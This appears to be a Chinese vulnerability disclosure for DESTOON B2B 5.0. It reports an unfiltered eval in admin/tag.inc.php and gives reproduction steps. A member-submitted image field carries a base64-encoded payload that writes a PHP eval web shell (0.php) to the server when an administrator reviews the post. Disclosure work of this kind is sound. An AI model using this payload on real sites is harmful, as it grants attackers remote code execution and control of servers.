### 简要描述:
测试版本
DESTOON B2B Version 5.0 Release 20140625 UTF-8 ZH-CN
### 详细说明:
0.问题文件 admin/tag.inc.php
95行 eval($tag_code); 未对用户提交的执行代码tag_code做安全限制
[<img src="https://images.seebug.org/upload/201407/07101233cb524baf7c9d0a2c743654e5e17fa520.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/07101233cb524baf7c9d0a2c743654e5e17fa520.jpg)
1.前台注册会员
2.进入会员中心,发布一条求购信息
信息标题:随意
行业分类:随意
产品图片:通过审查元素,修改 post[thumb] 的value为 ?file=tag&action=preview&tag_code=file_put_contents(base64_decode(MC5waHA),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4))
提交
[<img src="https://images.seebug.org/upload/201407/07101305b98be2d789ca2fe2c46dbc536c6fdd59.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/07101305b98be2d789ca2fe2c46dbc536c6fdd59.jpg)
3.只要管理员后台审核信息,就会执行代码
file_put_contents(base64_decode(MC5waHA),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4))
[<img src="https://images.seebug.org/upload/201407/07101350c7603b306d3804b1a782e3d2509837c2.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/07101350c7603b306d3804b1a782e3d2509837c2.jpg)
[<img src="https://images.seebug.org/upload/201407/07101406346e0e772944ba8de6c13aeb0c3d0e43.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/07101406346e0e772944ba8de6c13aeb0c3d0e43.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201407/07101406346e0e772944ba8de6c13aeb0c3d0e43.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/07101406346e0e772944ba8de6c13aeb0c3d0e43.jpg)
京公网安备 11010502034610号
暂无评论